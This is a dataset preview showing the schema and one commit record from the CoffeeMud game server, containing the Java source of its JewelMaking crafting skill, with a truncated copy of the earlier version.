field         dtype           values
lang          stringclasses   2 values
license       stringclasses   13 values
stderr        stringlengths   0–343
commit        stringlengths   40–40
returncode    int64           0–128
repos         stringlengths   6–87.7k
new_contents  stringlengths   0–6.23M
new_file      stringlengths   3–311
old_contents  stringlengths   0–6.23M
message       stringlengths   6–9.1k
old_file      stringlengths   3–311
subject       stringlengths   0–4k
git_diff      stringlengths   0–6.31M
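Each preview row below follows this schema in column order. As a quick orientation, here is a minimal sketch of how a dataset with this schema could be loaded and inspected, assuming it is hosted as a Hugging Face dataset; the path "user/commit-data" is a placeholder, not the real identifier.

```python
# Minimal sketch: load a dataset with the schema above and inspect one row.
# Assumption: the data is hosted as a Hugging Face dataset; "user/commit-data"
# is a placeholder path, not the actual dataset identifier.
from datasets import load_dataset

ds = load_dataset("user/commit-data", split="train")

row = ds[0]
# Scalar fields from the schema.
print(row["lang"], row["license"], row["returncode"])
print("commit:", row["commit"])
print("subject:", row["subject"])

# The file-level fields hold whole source files plus the diff between them.
print("old_file:", row["old_file"], "->", "new_file:", row["new_file"])
print(row["git_diff"][:300])
```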
lang: Java
license: apache-2.0
commit: 7079cfa9ff39dd2aeb87a1da801e2b0cf9cd6a66
returncode: 0
repos: bozimmerman/CoffeeMud,bozimmerman/CoffeeMud,bozimmerman/CoffeeMud,bozimmerman/CoffeeMud
new_contents:
package com.planet_ink.coffee_mud.Abilities.Common; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftParms; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftingActivity; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.Session.InputCallback; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Libraries.interfaces.AchievementLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.ListingLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.MaterialLibrary; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2002-2018 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
*/ public class JewelMaking extends EnhancedCraftingSkill implements ItemCraftor, MendingSkill { @Override public String ID() { return "JewelMaking"; } private final static String localizedName = CMLib.lang().L("Jewel Making"); @Override public String name() { return localizedName; } private static final String[] triggerStrings = I(new String[] { "JEWEL", "JEWELMAKING" }); @Override public String[] triggerStrings() { return triggerStrings; } @Override public String supportedResourceString() { return "GLASS|PRECIOUS|SAND"; } @Override public String parametersFormat() { return "ITEM_NAME\tITEM_LEVEL\tBUILD_TIME_TICKS\tMATERIALS_REQUIRED\tITEM_BASE_VALUE\t" +"ITEM_CLASS_ID\tSTATUE||CODED_WEAR_LOCATION\tN_A\tBASE_ARMOR_AMOUNT||DICE_SIDES\tOPTIONAL_RESOURCE_OR_MATERIAL\tCODED_SPELL_LIST"; } //protected static final int RCP_FINALNAME=0; //protected static final int RCP_LEVEL=1; //protected static final int RCP_TICKS=2; protected static final int RCP_WOOD = 3; protected static final int RCP_VALUE = 4; protected static final int RCP_CLASSTYPE = 5; protected static final int RCP_MISCTYPE = 6; // private static final int RCP_CAPACITY=7; protected static final int RCP_ARMORDMG = 8; protected static final int RCP_EXTRAREQ = 9; protected static final int RCP_SPELL = 10; protected Pair<Item,String> beingDone=null; @Override public boolean tick(final Tickable ticking, final int tickID) { if((affected!=null)&&(affected instanceof MOB)&&(tickID==Tickable.TICKID_MOB)) { final MOB mob=(MOB)affected; if(fireRequired) { if((buildingI==null) ||(getRequiredFire(mob,0)==null)) { messedUp=true; unInvoke(); } } } return super.tick(ticking,tickID); } @Override public String parametersFile() { return "jewelmaking.txt"; } @Override protected List<List<String>> loadRecipes() { return super.loadRecipes(parametersFile()); } @Override protected boolean doLearnRecipe(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { fireRequired=false; return super.doLearnRecipe( mob, commands, givenTarget, auto, asLevel ); } @Override public void unInvoke() { if(canBeUninvoked()) { if(affected instanceof MOB) { final MOB mob=(MOB)affected; if((buildingI!=null)&&(!aborted)) { if(beingDone!=null) { if(messedUp) commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); else { final Item I=beingDone.first; buildingI.setBaseValue(buildingI.baseGoldValue()+(I.baseGoldValue()*2)); buildingI.setDescription(buildingI.description()+" "+beingDone.second); } beingDone=null; } else if(messedUp) { if(activity == CraftingActivity.MENDING) messedUpCrafting(mob); else if(activity == CraftingActivity.LEARNING) { commonEmote(mob,L("<S-NAME> fail(s) to learn how to make @x1.",buildingI.name())); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) commonEmote(mob,L("<S-NAME> mess(es) up refitting @x1.",buildingI.name())); else commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); } else { if(activity == CraftingActivity.MENDING) { buildingI.setUsesRemaining(100); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.MENDER, 1, this); } else if(activity==CraftingActivity.LEARNING) { deconstructRecipeInto(mob, buildingI, recipeHolder ); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) { buildingI.basePhyStats().setHeight(0); buildingI.recoverPhyStats(); } else { dropAWinner(mob,buildingI); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.CRAFTING, 1, this); } } } buildingI=null; activity = CraftingActivity.CRAFTING; 
} } super.unInvoke(); } @Override public boolean mayICraft(final Item I) { if(I==null) return false; if(!super.mayBeCrafted(I)) return false; if(CMLib.flags().isDeadlyOrMaliciousEffect(I)) return false; if((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS) { if(I instanceof Rideable) { final Rideable R=(Rideable)I; final int rideType=R.rideBasis(); switch(rideType) { case Rideable.RIDEABLE_LADDER: case Rideable.RIDEABLE_SLEEP: case Rideable.RIDEABLE_SIT: case Rideable.RIDEABLE_TABLE: return true; default: return false; } } else if(I instanceof Armor) { if(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST)) return true; return (isANativeItem(I.Name())); } if(I.rawProperLocationBitmap()==Wearable.WORN_HELD) return true; return true; } else if((I instanceof Armor) &&(((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL))) { final Armor A=(Armor)I; if((CMath.bset(A.getLayerAttributes(), Armor.LAYERMASK_SEETHROUGH)) &&(A.basePhyStats().armor()<3)) return true; if((A.basePhyStats().armor()<2) &&(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST))) return true; return (isANativeItem(I.Name())); } return (isANativeItem(I.Name())); } @Override public boolean supportsMending(final Physical I) { return canMend(null, I, true); } @Override protected boolean canMend(final MOB mob, final Environmental E, final boolean quiet) { if(!super.canMend(mob,E,quiet)) return false; if((!(E instanceof Item)) ||(!mayICraft((Item)E))) { if(!quiet) commonTell(mob,L("That's not an jewelworked item.")); return false; } return true; } @Override public String getDecodedComponentsDescription(final MOB mob, final List<String> recipe) { return super.getComponentDescription( mob, recipe, RCP_WOOD ); } @Override public boolean invoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { return autoGenInvoke(mob,commands,givenTarget,auto,asLevel,0,false,new Vector<Item>(0)); } @Override protected boolean autoGenInvoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel, final int autoGenerate, final boolean forceLevels, final List<Item> crafted) { final List<String> originalCommands = new XVector<String>(commands); if(super.checkStop(mob, commands)) return true; if(super.checkInfo(mob, commands)) return true; fireRequired=true; final PairVector<EnhancedExpertise,Integer> enhancedTypes=enhancedTypes(mob,commands); int recipeLevel = 1; randomRecipeFix(mob,addRecipes(mob,loadRecipes()),commands,autoGenerate); if(commands.size()==0) { commonTell(mob,L("Make what? Enter \"jewel list\" for a list. 
You may also enter jewel encrust <gem name> <item name>, " + "jewel mount <gem name> <item name>, jewel refit <item name>, jewel info <item>, jewel learn <item>, " + "jewel scan, jewel mend <item name>, or jewel stop to cancel.")); return false; } if((!auto) &&(commands.size()>0) &&((commands.get(0)).equalsIgnoreCase("bundle"))) { bundling=true; if(super.invoke(mob,commands,givenTarget,auto,asLevel)) return super.bundle(mob,commands); return false; } final List<List<String>> recipes=addRecipes(mob,loadRecipes()); final String str=commands.get(0); String startStr=null; fireRequired=true; bundling=false; int duration=4; String misctype=""; if(str.equalsIgnoreCase("list")) { String mask=CMParms.combine(commands,1); boolean allFlag=false; if(mask.equalsIgnoreCase("all")) { allFlag=true; mask=""; } int toggler=1; final int toggleTop=2; final StringBuffer buf=new StringBuffer(""); final int[] cols={ CMLib.lister().fixColWidth(27,mob.session()), CMLib.lister().fixColWidth(3,mob.session()), CMLib.lister().fixColWidth(5,mob.session()) }; for(int r=0;r<toggleTop;r++) buf.append((r>0?" ":"")+CMStrings.padRight(L("Item"),cols[0])+" "+CMStrings.padRight(L("Lvl"),cols[1])+" "+CMStrings.padRight(L("Metal"),cols[2])); buf.append("\n\r"); final List<List<String>> listRecipes=((mask.length()==0) || mask.equalsIgnoreCase("all")) ? recipes : super.matchingRecipeNames(recipes, mask, true); for(int r=0;r<listRecipes.size();r++) { final List<String> V=listRecipes.get(r); if(V.size()>0) { final String item=replacePercent(V.get(RCP_FINALNAME),""); final int level=CMath.s_int(V.get(RCP_LEVEL)); final String wood=getComponentDescription(mob,V,RCP_WOOD); if(wood.length()>5) { if(toggler>1) buf.append("\n\r"); toggler=toggleTop; } if((level<=xlevel(mob))||allFlag) { buf.append(CMStrings.padRight(item,cols[0])+" "+CMStrings.padRight(""+level,cols[1])+" "+CMStrings.padRightPreserve(""+wood,cols[2])+((toggler!=toggleTop)?" 
":"\n\r")); if(++toggler>toggleTop) toggler=1; } } } commonTell(mob,buf.toString()); enhanceList(mob); return true; } else if(((commands.get(0))).equalsIgnoreCase("learn")) { return doLearnRecipe(mob, commands, givenTarget, auto, asLevel); } else if((str.equalsIgnoreCase("encrust"))||(str.equalsIgnoreCase("mount"))) { final String word=str.toLowerCase(); if(commands.size()<3) { commonTell(mob,L("@x1 what jewel onto what item?",CMStrings.capitalizeAndLower(word))); return false; } final Item fire=getRequiredFire(mob,autoGenerate); buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; if(fire==null) return false; final String jewel=commands.get(1); final String rest=CMParms.combine(commands,2); final Environmental jewelE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,jewel,Wearable.FILTER_UNWORNONLY); final Environmental thangE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,rest,Wearable.FILTER_UNWORNONLY); if((jewelE==null)||(!CMLib.flags().canBeSeenBy(jewelE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",jewel)); return false; } if((thangE==null)||(!CMLib.flags().canBeSeenBy(thangE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",rest)); return false; } if((!(jewelE instanceof RawMaterial))||(!(jewelE instanceof Item)) ||(((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_PRECIOUS) &&((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_GLASS))) { commonTell(mob,L("A @x1 is not suitable to @x2 on anything.",jewelE.name(),word)); return false; } final Item jewelI=(Item)CMLib.materials().unbundle((Item)jewelE,1,null); if(jewelI==null) { commonTell(mob,L("@x1 is not pure enough to be @x2ed with. You will need to use a gathered one.",jewelE.name(),word)); return false; } if((!(thangE instanceof Item)) ||(!thangE.isGeneric()) ||(((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_CLOTH) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_METAL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_MITHRIL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_SYNTHETIC) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_ROCK) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_WOODEN) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_LEATHER))) { commonTell(mob,L("A @x1 is not suitable to be @x2ed on.",thangE.name(),word)); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; buildingI=(Item)thangE; beingDone=new Pair<Item,String>(null,""); String materialName=RawMaterial.CODES.NAME(jewelI.material()).toLowerCase(); if(word.equals("encrust")) { beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" is encrusted with bits of "+materialName+"."); startStr=L("<S-NAME> start(s) encrusting @x1 with @x2.",buildingI.name(),materialName); displayText=L("You are encrusting @x1 with @x2",buildingI.name(),materialName); verb=L("encrusting @x1 with bits of @x2",buildingI.name(),materialName); } else { materialName=CMLib.english().startWithAorAn(materialName).toLowerCase(); beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" has "+materialName+" mounted on it."); startStr=L("<S-NAME> start(s) mounting @x1 onto @x2.",materialName,buildingI.name()); displayText=L("You are mounting @x1 onto @x2",materialName,buildingI.name()); verb=L("mounting @x1 onto 
@x2",materialName,buildingI.name()); } beingDone.first = jewelI; messedUp=!proficiencyCheck(mob,0,auto); duration=10; final CMMsg msg=CMClass.getMsg(mob,null,this,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { jewelI.destroy(); mob.location().send(mob,msg); beneficialAffect(mob,mob,asLevel,duration); return true; } return false; } if(str.equalsIgnoreCase("scan")) return publicScan(mob,commands); else if(str.equalsIgnoreCase("mend")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(!canMend(mob, buildingI,false)) return false; activity = CraftingActivity.MENDING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) mending @x1.",buildingI.name()); displayText=L("You are mending @x1",buildingI.name()); verb=L("mending @x1",buildingI.name()); } else if(str.equalsIgnoreCase("refit")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(buildingI==null) return false; if(!mayICraft(mob,buildingI)) return false; if(buildingI.phyStats().height()==0) { commonTell(mob,L("@x1 is already the right size.",buildingI.name(mob))); return false; } activity = CraftingActivity.REFITTING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) refitting @x1.",buildingI.name()); displayText=L("You are refitting @x1",buildingI.name()); verb=L("refitting @x1",buildingI.name()); } else { beingDone=null; buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; String statue=null; if((commands.size()>1)&&(commands.get(commands.size()-1)).startsWith("STATUE=")) { statue=((commands.get(commands.size()-1)).substring(7)).trim(); if(statue.length()==0) statue=null; else commands.remove(commands.size()-1); } int amount=-1; if((commands.size()>1)&&(CMath.isNumber(commands.get(commands.size()-1)))) { amount=CMath.s_int(commands.get(commands.size()-1)); commands.remove(commands.size()-1); } final String recipeName=CMParms.combine(commands,0); List<String> foundRecipe=null; final List<List<String>> matches=matchingRecipeNames(recipes,recipeName,true); for(int r=0;r<matches.size();r++) { final List<String> V=matches.get(r); if(V.size()>0) { final int level=CMath.s_int(V.get(RCP_LEVEL)); if((autoGenerate>0)||(level<=xlevel(mob))) { foundRecipe=V; recipeLevel=level; break; } } } if(foundRecipe==null) { commonTell(mob,L("You don't know how to make a '@x1'. 
Try \"jewel list\" for a list.",recipeName)); return false; } misctype=foundRecipe.get(RCP_MISCTYPE); bundling=misctype.equalsIgnoreCase("BUNDLE"); if(!bundling) { final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; } else fireRequired=false; final String woodRequiredStr = foundRecipe.get(RCP_WOOD); final int[] compData = new int[CF_TOTAL]; final String realRecipeName=replacePercent(foundRecipe.get(RCP_FINALNAME),""); final List<Object> componentsFoundList=getAbilityComponents(mob, woodRequiredStr, "make "+CMLib.english().startWithAorAn(realRecipeName),autoGenerate,compData,1); if(componentsFoundList==null) return false; int woodRequired=CMath.s_int(woodRequiredStr); woodRequired=adjustWoodRequired(woodRequired,mob); if(amount>woodRequired) woodRequired=amount; final String otherRequired=foundRecipe.get(RCP_EXTRAREQ); final int[] pm={RawMaterial.MATERIAL_MITHRIL,RawMaterial.MATERIAL_METAL}; final int[][] data=fetchFoundResourceData(mob, woodRequired,"metal",pm, otherRequired.length()>0?1:0,otherRequired,null, false, autoGenerate, enhancedTypes); if(data==null) return false; fixDataForComponents(data,woodRequiredStr,(autoGenerate>0) && (woodRequired==0),componentsFoundList, 1); woodRequired=data[0][FOUND_AMT]; final Session session=mob.session(); if((misctype.equalsIgnoreCase("statue")) &&(session!=null) &&((statue==null)||(statue.trim().length()==0))) { final Ability me=this; final Physical target=givenTarget; if(autoGenerate>0) statue=mob.Name(); else session.prompt(new InputCallback(InputCallback.Type.PROMPT,"",0) { @Override public void showPrompt() { session.promptPrint(L("What is this item a representation of?\n\r: ")); } @Override public void timedOut() { } @Override public void callBack() { final String of=this.input; if((of.trim().length()==0)||(of.indexOf('<')>=0)) return; final Vector<String> newCommands=new XVector<String>(originalCommands); newCommands.add("STATUE="+of); me.invoke(mob, newCommands, target, auto, asLevel); } }); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; final MaterialLibrary.DeadResourceRecord deadMats; if((componentsFoundList.size() > 0)||(autoGenerate>0)) deadMats = new MaterialLibrary.DeadResourceRecord(); else deadMats = CMLib.materials().destroyResources(mob.location(),woodRequired,data[0][FOUND_CODE],data[1][FOUND_CODE],null,null); final MaterialLibrary.DeadResourceRecord deadComps = CMLib.ableComponents().destroyAbilityComponents(componentsFoundList); final int lostValue=autoGenerate>0?0:(deadMats.lostValue + deadComps.lostValue); buildingI=CMClass.getItem(foundRecipe.get(RCP_CLASSTYPE)); if(buildingI==null) { commonTell(mob,L("There's no such thing as a @x1!!!",foundRecipe.get(RCP_CLASSTYPE))); return false; } duration=getDuration(CMath.s_int(foundRecipe.get(RCP_TICKS)),mob,CMath.s_int(foundRecipe.get(RCP_LEVEL)),4); String itemName=null; buildingI.setMaterial(getBuildingMaterial(woodRequired,data,compData)); if((otherRequired.length()>0)&&(otherRequired.equalsIgnoreCase("PRECIOUS"))) itemName=replacePercent(foundRecipe.get(RCP_FINALNAME),RawMaterial.CODES.NAME((data[1][FOUND_CODE]))).toLowerCase(); else itemName=determineFinalName(foundRecipe.get(RCP_FINALNAME),buildingI.material(),deadMats,deadComps); if(bundling) itemName="a "+woodRequired+"# "+itemName; else if(!CMLib.english().startsWithAnArticle(itemName)) itemName=CMLib.english().startWithAorAn(itemName); buildingI.setName(itemName); startStr=L("<S-NAME> start(s) making @x1.",buildingI.name()); displayText=L("You are making 
@x1",buildingI.name()); verb=L("making @x1",buildingI.name()); playSound="tinktinktink.wav"; buildingI.setDisplayText(L("@x1 lies here",itemName)); if((data[1][FOUND_CODE]>0) &&(((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL)) &&(((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS))) buildingI.setDescription(L("@x1 made of @x2.",itemName,RawMaterial.CODES.NAME(data[0][FOUND_CODE]).toLowerCase())); else buildingI.setDescription(itemName+". "); buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); if(buildingI.basePhyStats().weight()<=0) buildingI.basePhyStats().setWeight(1); final int valueAdjust = (woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE]))); buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+valueAdjust); setBrand(mob, buildingI); if((buildingI.material()!=data[1][FOUND_CODE]) &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0)) buildingI.setBaseValue(buildingI.baseGoldValue()+RawMaterial.CODES.VALUE(data[1][FOUND_CODE])); buildingI.basePhyStats().setLevel(CMath.s_int(foundRecipe.get(RCP_LEVEL))); //int capacity=CMath.s_int((String)foundRecipe.get(RCP_CAPACITY)); final int armordmg=CMath.s_int(foundRecipe.get(RCP_ARMORDMG)); final String spell=(foundRecipe.size()>RCP_SPELL)?foundRecipe.get(RCP_SPELL).trim():""; addSpells(buildingI,spell,deadMats.lostProps,deadComps.lostProps); if((buildingI instanceof Armor)&&(!(buildingI instanceof FalseLimb))) { ((Armor)buildingI).basePhyStats().setArmor(0); if(armordmg!=0) ((Armor)buildingI).basePhyStats().setArmor(armordmg); setWearLocation(buildingI,misctype,0); } if(buildingI.ID().endsWith("Dice")) { buildingI.basePhyStats().setAbility(armordmg); } if((misctype.equalsIgnoreCase("statue")) &&(statue!=null) &&(statue.trim().length()>0)) { buildingI.setName(L("@x1 of @x2",itemName,statue.trim())); buildingI.setDisplayText(L("@x1 of @x2 is here",itemName,statue.trim())); buildingI.setDescription(L("@x1 of @x2. ",itemName,statue.trim())); } if(bundling) buildingI.setBaseValue(lostValue); buildingI.recoverPhyStats(); buildingI.text(); buildingI.recoverPhyStats(); } messedUp=!proficiencyCheck(mob,0,auto); if(bundling) { messedUp=false; duration=1; verb=L("bundling @x1",RawMaterial.CODES.NAME(buildingI.material()).toLowerCase()); startStr=L("<S-NAME> start(s) @x1.",verb); displayText=L("You are @x1",verb); } if(autoGenerate>0) { crafted.add(buildingI); return true; } final CMMsg msg=CMClass.getMsg(mob,buildingI,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { mob.location().send(mob,msg); buildingI=(Item)msg.target(); beneficialAffect(mob,mob,asLevel,duration); enhanceItem(mob,buildingI,recipeLevel,enhancedTypes); return true; } else if(bundling) { messedUp=false; aborted=false; unInvoke(); } return false; } }
new_file: com/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java
old_contents:
package com.planet_ink.coffee_mud.Abilities.Common; import com.planet_ink.coffee_mud.core.interfaces.*; import com.planet_ink.coffee_mud.core.*; import com.planet_ink.coffee_mud.core.collections.*; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftParms; import com.planet_ink.coffee_mud.Abilities.Common.CraftingSkill.CraftingActivity; import com.planet_ink.coffee_mud.Abilities.interfaces.*; import com.planet_ink.coffee_mud.Areas.interfaces.*; import com.planet_ink.coffee_mud.Behaviors.interfaces.*; import com.planet_ink.coffee_mud.CharClasses.interfaces.*; import com.planet_ink.coffee_mud.Commands.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.*; import com.planet_ink.coffee_mud.Common.interfaces.Session.InputCallback; import com.planet_ink.coffee_mud.Exits.interfaces.*; import com.planet_ink.coffee_mud.Items.interfaces.*; import com.planet_ink.coffee_mud.Libraries.interfaces.AchievementLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.ListingLibrary; import com.planet_ink.coffee_mud.Libraries.interfaces.MaterialLibrary; import com.planet_ink.coffee_mud.Locales.interfaces.*; import com.planet_ink.coffee_mud.MOBS.interfaces.*; import com.planet_ink.coffee_mud.Races.interfaces.*; import java.util.*; /* Copyright 2002-2018 Bo Zimmerman Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
*/ public class JewelMaking extends EnhancedCraftingSkill implements ItemCraftor, MendingSkill { @Override public String ID() { return "JewelMaking"; } private final static String localizedName = CMLib.lang().L("Jewel Making"); @Override public String name() { return localizedName; } private static final String[] triggerStrings = I(new String[] { "JEWEL", "JEWELMAKING" }); @Override public String[] triggerStrings() { return triggerStrings; } @Override public String supportedResourceString() { return "GLASS|PRECIOUS|SAND"; } @Override public String parametersFormat() { return "ITEM_NAME\tITEM_LEVEL\tBUILD_TIME_TICKS\tMATERIALS_REQUIRED\tITEM_BASE_VALUE\t" +"ITEM_CLASS_ID\tSTATUE||CODED_WEAR_LOCATION\tN_A\tBASE_ARMOR_AMOUNT||DICE_SIDES\tOPTIONAL_RESOURCE_OR_MATERIAL\tCODED_SPELL_LIST"; } //protected static final int RCP_FINALNAME=0; //protected static final int RCP_LEVEL=1; //protected static final int RCP_TICKS=2; protected static final int RCP_WOOD = 3; protected static final int RCP_VALUE = 4; protected static final int RCP_CLASSTYPE = 5; protected static final int RCP_MISCTYPE = 6; // private static final int RCP_CAPACITY=7; protected static final int RCP_ARMORDMG = 8; protected static final int RCP_EXTRAREQ = 9; protected static final int RCP_SPELL = 10; protected Pair<Item,String> beingDone=null; @Override public boolean tick(final Tickable ticking, final int tickID) { if((affected!=null)&&(affected instanceof MOB)&&(tickID==Tickable.TICKID_MOB)) { final MOB mob=(MOB)affected; if(fireRequired) { if((buildingI==null) ||(getRequiredFire(mob,0)==null)) { messedUp=true; unInvoke(); } } } return super.tick(ticking,tickID); } @Override public String parametersFile() { return "jewelmaking.txt"; } @Override protected List<List<String>> loadRecipes() { return super.loadRecipes(parametersFile()); } @Override protected boolean doLearnRecipe(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { fireRequired=false; return super.doLearnRecipe( mob, commands, givenTarget, auto, asLevel ); } @Override public void unInvoke() { if(canBeUninvoked()) { if(affected instanceof MOB) { final MOB mob=(MOB)affected; if((buildingI!=null)&&(!aborted)) { if(beingDone!=null) { if(messedUp) commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); else { final Item I=beingDone.first; buildingI.setBaseValue(buildingI.baseGoldValue()+(I.baseGoldValue()*2)); buildingI.setDescription(buildingI.description()+" "+beingDone.second); } beingDone=null; } else if(messedUp) { if(activity == CraftingActivity.MENDING) messedUpCrafting(mob); else if(activity == CraftingActivity.LEARNING) { commonEmote(mob,L("<S-NAME> fail(s) to learn how to make @x1.",buildingI.name())); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) commonEmote(mob,L("<S-NAME> mess(es) up refitting @x1.",buildingI.name())); else commonEmote(mob,L("<S-NAME> mess(es) up @x1.",verb)); } else { if(activity == CraftingActivity.MENDING) { buildingI.setUsesRemaining(100); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.MENDER, 1, this); } else if(activity==CraftingActivity.LEARNING) { deconstructRecipeInto(mob, buildingI, recipeHolder ); buildingI.destroy(); } else if(activity == CraftingActivity.REFITTING) { buildingI.basePhyStats().setHeight(0); buildingI.recoverPhyStats(); } else { dropAWinner(mob,buildingI); CMLib.achievements().possiblyBumpAchievement(mob, AchievementLibrary.Event.CRAFTING, 1, this); } } } buildingI=null; activity = CraftingActivity.CRAFTING; 
